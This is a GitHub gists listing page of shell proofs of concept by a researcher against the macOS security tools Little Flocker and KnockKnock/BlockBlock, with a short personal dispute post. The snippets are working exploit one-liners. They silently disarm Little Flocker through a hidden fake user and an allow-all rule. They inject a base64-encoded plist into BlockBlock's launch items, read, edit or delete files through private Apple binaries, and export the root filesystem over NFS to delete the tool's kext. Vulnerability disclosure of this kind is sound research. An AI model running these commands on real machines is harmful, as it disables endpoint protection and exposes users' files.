Skip to content

Instantly share code, notes, and snippets.

😎
Focusing

Sabri pwnsdx

😎
Focusing
Block or report user

Report or block pwnsdx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pwnsdx
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
View ff.sh
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
@pwnsdx
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
View response.txt
Hello,
Here is the last discussion I had with him (he dared mentioned me on a 10 days old topic and then when I give arguments to the very same topic or replies to his attacks I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebin: https://i.imgur.com/TRqgn5g.png
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
View ff.sh
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
@pwnsdx
pwnsdx / kk.sh
Last active Dec 22, 2018
Bypass KnockKnock (& BlockBlock) LaunchAgents/LaunchDaemons detection (CLI+UI versions) (<=1.9.0, 0DAY)
View kk.sh
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
@pwnsdx
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
View ff.sh
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
@pwnsdx
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
@pwnsdx
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
View ff.sh
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
View detect.sh
#!/bin/bash
echo "Please wait..."
# Look for suspect files
/usr/bin/find -E /Applications -iregex '.*\.app\/(.*\.DS_Store|Icon.{1})$' > /tmp/.suspectfiles
# Check suspect files
appsCounter=0
while read path; do
@pwnsdx
pwnsdx / ff.sh
Last active Jan 7, 2017
Critical vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.45)
View ff.sh
# Access, modify or delete any files on the hard drive (except SIP'ed files of course)
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned
# Or just delete Little Flocker kext?
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned && rm -rf /tmp/.pwned/Library/Extensions/LittleFlocker.kext/Contents/MacOS/LittleFlocker
View gist:c9fa935acf3524e2543ac9c88078629e
xattr -wx com.apple.FinderInfo 69636F6E4D414353401000000000000000000000000000000000000000000000 [file; buggy on dirs]
You can’t perform that action at this time.